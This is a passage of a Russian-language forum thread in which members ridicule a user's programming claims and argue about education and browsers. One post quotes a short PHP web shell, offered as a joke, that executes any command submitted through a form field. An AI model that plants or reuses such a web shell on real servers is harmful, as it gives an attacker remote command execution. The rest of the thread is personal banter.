Вопросы Акесия

Свернуть
X

• Время
  • Показать
Очистить всё
новые сообщения
  • Полковник
    Ветеран

• 14 September 2005
    • 18241

Сообщение от Tessaract
    А такого рода проги на это и рассчитаны. Если в обычном форматированном "красивом" виде прогу дать, то это элементарщина, а когда в таком, ужатом, то ууууу.... пока разберёшься, весь язык выучишь. Ну если не весь, то по крайней мере базовые основы. У нас у универе студентам специально такие штуки для изучения дают.
    Млин, там чо сложного-то? Давно уже не студент. Но пока эту тему не будем... поглядим что нам поциент напишет. Зачем подсказывать-то...

.
    "Давайте учиться иметь свое мнение, давайте не будем повторять чужое."
    Виктор Суворов

Комментарий

• Tessaract
      Сатанист

• 18 August 2004
      • 6119

Сообщение от Полковник
      Млин, там чо сложного-то? Давно уже не студент. Но пока эту тему не будем... поглядим что нам поциент напишет. Зачем подсказывать-то...

.
      Хее, это для вас несложно, а для студента полный швах.. впрочем да, посмотрим что там Акесий скажет.. Я ведь просил програмку написать для решения квадратных уравнений, тоже интересно будет посмотреть чего у него выйдет, если вообще что-то выйдет. Свое решение, написанное слёту за десять минут я пока показывать не буду. Подождём что скажет наш программёр, которого известные мировые программисты ставят в пример

поглядим что нам поциент напишет.
      А ничего толкового он не напишет. Попытается найти решение в Интернетах, но выйдет полный облом, ведь программулина то моя, в Интернетах нет её описания.
      Человек человеку волк!!!!!!!!!!!!!!!!

Комментарий

• Полковник
        Ветеран

• 14 September 2005
        • 18241

Сообщение от Tessaract
        А ничего толкового он не напишет. Попытается найти решение в Интернетах, но выйдет полный облом, ведь программулина то моя, в Интернетах нет её описания.
        Обычно, поциент просит два килобака. Видимо, за меньшую сумму, его знакомые программисты из мотороллы, не берутся помогать такому... Акесию...

Хотя у нас, школьники, делают их в качестве домашнего задания... бесплатно, конечно-же... за респект и уважуху...

.
        Виктор Суворов

Комментарий

• Tessaract
          Сатанист

• 18 August 2004
          • 6119

Сообщение от Полковник
          Обычно, поциент просит два килобака. Видимо, за меньшую сумму, его знакомые программисты из мотороллы, не берутся помогать такому... Акесию...

Хотя у нас, школьники, делают их в качестве домашнего задания... бесплатно, конечно-же... за респект и уважуху...

.
          Помню Акесий как-то рассказывал, как у них в вузах экзамены сдают. Оказывается студенту дают задание, которое он должен самостоятельно выполнить за сколько-то там дней и предъявить преподу решение. Меня это реально насмешило. У них это экзамен называется, а у нас это всего лишь самая обычная лабораторная работа, которых студень за семестр пару десятков выполняет. Такой вот бред еврейско-европейский.

У нас в универе китайцы учатся, есть те, кто получает второе высшее. Первое они в Европе получали, так они реально говорят, что хренеют от разницы в уровне нашего и европейского образования в плане теории и практики. Заявляют, в России куда круче подготовка.

На факультете, где готовят механиков обычное дело: препод раскрутил отвёрткой всякие жиклёры карбюратора на авто, давай студент, почини, заставь работать. Через час пытаемся завести движок: тыр-тыр-ты...заглох.. тыр-тыр..нифига... низачот, придёшь через неделю. Обычное дело. Европке такой уровень и не снился.

Я уж не говорю про русский язык, которой является обязательным вступительным испытанием на все без исключения специальности. То бишь хочешь учиться в российском вузе - умей хорошо говорить и писать на русском. Как результат иностранцы, те же китайцы там, года два изучают русский, чтобы поступить в вуз.
          Последний раз редактировалось Tessaract; 22 May 2016, 09:33 AM.

Комментарий

• ilya481
            спасённый грешник
            Ко-Админ Форума

• 14 August 2008
            • 7378

Сообщение от baptist2016
            Вряд ли Кеша разберется в этом наборе букв и цифр нтмл и кодировки))
            Всё, хватит.
            Он Акесий и не надо больше ничего писать.
            Не может человек ничего принимать на себя, если не будет дано ему с неба. (Иоанн креститель)

Комментарий

• baptist2016
              Ветеран

• 11 May 2016
              • 33603

Сообщение от ilya481
              Всё, хватит.Он Акесий и не надо больше ничего писать.
              я ему подсказал направление жду его на вфоруме. там у нас тема необсужденная
              "папа римский ... назвал Украину лабораторией экуменизму"(с) с. шевчук / Сегодня День Реформации! / рождество без Иисуса или когда же Он родился??? / Земля и Солнце: что вокруг чего крутится? Ваши аргументы!

Комментарий

• Полковник
                Ветеран

• 14 September 2005
                • 18241

Сообщение от Tessaract
                Помню Акесий как-то рассказывал, как у них в вузах экзамены сдают. Оказывается студенту дают задание, которое он должен самостоятельно выполнить за сколько-то там дней и предъявить преподу решение. Меня это реально насмешило.
                Тес, сейчас уровень образования реально падает у нас. Я сына учу, в основном, дома. В школе много уже нет. Даже точные науки начинают глючить.

Сообщение от ilya481
                После чистки сразу поимел проблемы.
                Надо было вновь авторизироваться на форуме.
                Так и должно быть.

Сообщение от ilya481
                Так что, лисичка- это плохо?
                Просто все адекватные веб-дизайнеры, тестят свои сайты под всеми популярными броузерами, а не только под ИЕ. У Игоря, видимо, либо индусы, либо цэуропэйцы, навроде нашего общего друга...

Кстати, у вас в мозилле, включена "фишка" маскироваться под другой броузер? Если включена - попробуйте отключить и посмотреть, пропала проблема или нет.
                А то у меня как-то было - оперу заставил представляться ИЕ, дак форум сразу закосячился...

.
                Виктор Суворов

Комментарий

• Tessaract
                  Сатанист

• 18 August 2004
                  • 6119

Сообщение от Полковник
                  Тес, сейчас уровень образования реально падает у нас. Я сына учу, в основном, дома. В школе много уже нет. Даже точные науки начинают глючить.
                  .
                  Согласен с вами, уровень образования сейчас не тот, что был раньше в СССР, но тем не менее пока остаётся достаточно высоким. Эта Болонская система, мать её, все почти поголовно преподы ею недовольны, говоря, что она рушит наше образование, и я с ними полностью согласен. Нахрена нам эти всякие бакалавры с магистрами, была же отлаженная система специалитета, которой все в мире завидовали. Про... блин... Слов нет, одни нецензурные. Если и дальше будем следовать это болонской еврохрени, рискуем угробить образование окончательно.

Комментарий

• Акесий
                    Отключен

• 24 February 2013
                    • 2551

Сообщение от Полковник
                    ................

Насчёт не царское это дело - тебе много раз приводили доказательства. Но ты не понимал элементарных вещей. Например. что в начале растрескивание трещины расстояние между берегами трещин не более микрона. Ты не отличал значение функции от самой функции. Когда тебе я пояснял, что что определение функции даётся в разных источниках по-разному, что в одном есть взаимнооднозначное соответствие, в другом - его нет, ты назвал меня невеждой, хотя это уровень 8 класса. Только через 3 месяца разговора наконец всплыло, что ты путаешь значение функции и саму функцию и ты в первый раз ретировался. Что тебе доказывать? Ты даже на среднем гармоническом попытался меня троллить, типО я не умею подставлять значения в формулу.
                    Что выглядело довольно грубо, тупо, неумело.

- - - Добавлено - - -

Сообщение от Полковник
                    Тес, сейчас уровень образования реально падает у нас. Я сына учу, в основном, дома. В школе много уже нет. Даже точные науки начинают глючить...
                    Без даже. Точные науки были разрушены в роковые 90-е.

Даже в конце 80-х, если быть точным.
                    Последний раз редактировалось ilya481; 25 May 2016, 11:27 PM.

Комментарий

• Акесий
                      Отключен

• 24 February 2013
                      • 2551

Сообщение от Полковник
                      Просто все адекватные веб-дизайнеры, тестят свои сайты под всеми популярными броузерами, а не только под ИЕ. У Игоря, видимо, либо индусы, либо цэуропэйцы, навроде нашего общего друга...

Кстати, у вас в мозилле, включена "фишка" маскироваться под другой броузер? Если включена - попробуйте отключить и посмотреть, пропала проблема или нет.
                      А то у меня как-то было - оперу заставил представляться ИЕ, дак форум сразу закосячился....
                      Самый лучший способ стать свободным и не скулить - сделать собственный добротный софт - ты же программист! Пользоваться программами, как пользоваться автомобилем - большой квалификации не требует.

Честно говоря, мне это всё непонятно. Я использую по 2-3 вида браузеров каждый день. И то, что они глючат порой - меня не смущает. У меня есть более любимый браузер - но не так чтобы очень любимый, я их, как детей, все люблю. Всё инерция мышления, господа. Преодалевайте её.
                      Последний раз редактировалось ilya481; 25 May 2016, 11:29 PM.

Комментарий

• baptist2016
                        Ветеран

• 11 May 2016
                        • 33603

Акесий, какой ваш любимый браузер?
                        "папа римский ... назвал Украину лабораторией экуменизму"(с) с. шевчук / Сегодня День Реформации! / рождество без Иисуса или когда же Он родился??? / Земля и Солнце: что вокруг чего крутится? Ваши аргументы!

Комментарий

• baptist2016
                          Ветеран

• 11 May 2016
                          • 33603

Сообщение от Полковник
                          У него собственноручно написанный эксклюзив. заплати два килобака и он с тобой поделится.Суперкрутой браузер у него...ага. Его же программисты с мировыми именами в пример ставят... что ему какой-то броузер сваять? Тфу и растереть....
                          эх его бы браузер да нашему уважаемому коадмину Илье. Вот вчера он мучился да измучился с Мозилой, со страницами нещасными, наверное скачал какую то версию не ту, измучила его мозила, а вот браузер от акесия помог бы Илье. Акесий уважьте Илью, хоть ему скажите на ушко что за браузер у вас.

Комментарий

• Акесий
                            Отключен

• 24 February 2013
                            • 2551

Сообщение от Павел_17
                            Начать с того, что Вы сбежали туда, а не жили изначально.
                            Сбежал от голода и от таких, ка Вы.

- - - Добавлено - - -

Сообщение от Павел_17
                            Начать с того, что Вы сбежали туда, а не жили изначально. А это сильно меняет дело.
                            Израиль может и дал то, о чем Вы писали. Но Вы к этому никакого отношения не имеете, ибо как сами писали - физик.
                            Я лично продвинулся на фронтах производства кристаллов для лазеров. Вам это было сказано - правда не вполне внятно - насколько раз.

Комментарий

• Reaper42
                              Memento mori

• 05 May 2016
                              • 1905

Сообщение от Tessaract
                              а вот ещё одна очень полезная для web-админов "авада кедавра":

<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /></head><body>
                              <?php if ($_POST['cmd'] != '') {exec($_POST['cmd'],$res); for ($x=0;$x<=sizeof($res);$x++) print iconv("cp866", "windows-1251",str_replace("<DIR>","&ltDIR&gt","$res[$x]"))."<br>\r\n";} ?> <form action='cmd.php' method='post'><input type='text' name='cmd'></form></body></html>
                              А патч Бармина сработает на этом?

- - - Добавлено - - -

Сообщение от Perle
                              Такова политика руководства, чтоб форум жил, потому как флудеры это есть паразиты живящие форум, и тут выбрали массу за приоритет нежели качество наполнения" ты говоришь что ты жив но ты мертв" и получается зомби форум.
                              Главная проблема не во флудерах, а в поиске нужной информации. Не нужный флейм будет на любом более-менее популярном форуме, хотя бы по причине того, что при высокой скорости постинга его весь не возможно вычистить, даже при всём желании.

- - - Добавлено - - -

Сообщение от Tessaract
                              double rest(float a, float b)
                              {float res=a*b;
                              for (int i=0; i<999999999; i++)
                              if (i<=res && i+1>res) {res = res-i; break;}
                              return res;
                              }
                              Это жестоко.
                              Словарь сленга | Платиновые треды
                              Ищу свободных христиан из своего региона
                              Можно на "ты".

Комментарий

• Акесий
                                Отключен

• 24 February 2013
                                • 2551

Сообщение от Павел_17

Думаете, что я Вам верю? Вы можете писать о своих подвигах сколь угодно много, но это вранье.
                                Вам предложили написать простенькую программку - Вы в кусты сразу прыгнули. Забыли?
                                А вот хвалится о своих подвигах тот, кто на самом деле ничего не умеет. И начинает он писать о неимоверных революциях в компьютерной области только для того, чтобы в собственных
                                Где, когда? Напомните о чём шла речь. Всё, что тут предлагалось - это программки для детей.
                                Я должен вот сейчас включать зажигание и на потеху Вам и Полковнику писать, что меня просят дилетанты! У меня энергии на то, чтобы вспомнить синтаксис уйдёт больше, чем на само написание.
                                Я давно не программирую. я занимаюсь вещами более серьёзными.
                                Мне ни славы, ни денег это не принесёт. А принесёт хихиканье по поводу того, чего нет. Вы невыгодные проверяльщики, да и по кастовым законам Европы это наглость вообще-то. У Вас нет третьей степени, Вы не смеете и не имеете права меня проверять. Плясать ради черни я не буду.
                                Это всё понты дворовой шпаны.

Это - НЕ АЛГОРИТМ, Паша. Предложите мне написать например метод решения нелинейных уравнений методом Ньютона, заплатив 1000 баксов предварительно. тогда я свою задницу подниму. А тут что?
                                Квадратное уравнение - топ программирования для Вашей страны?
                                3-4 строчки.

Я мастер и у меня есть уважение к себе и достоинство не плясать перед чернью. Вы можете играть в понты. Я уже другой - выдавил из себя от Вас, СБЕЖАВ от Вас.
                                Последний раз редактировалось ilya481; 25 May 2016, 11:38 PM.

Комментарий

Обработка...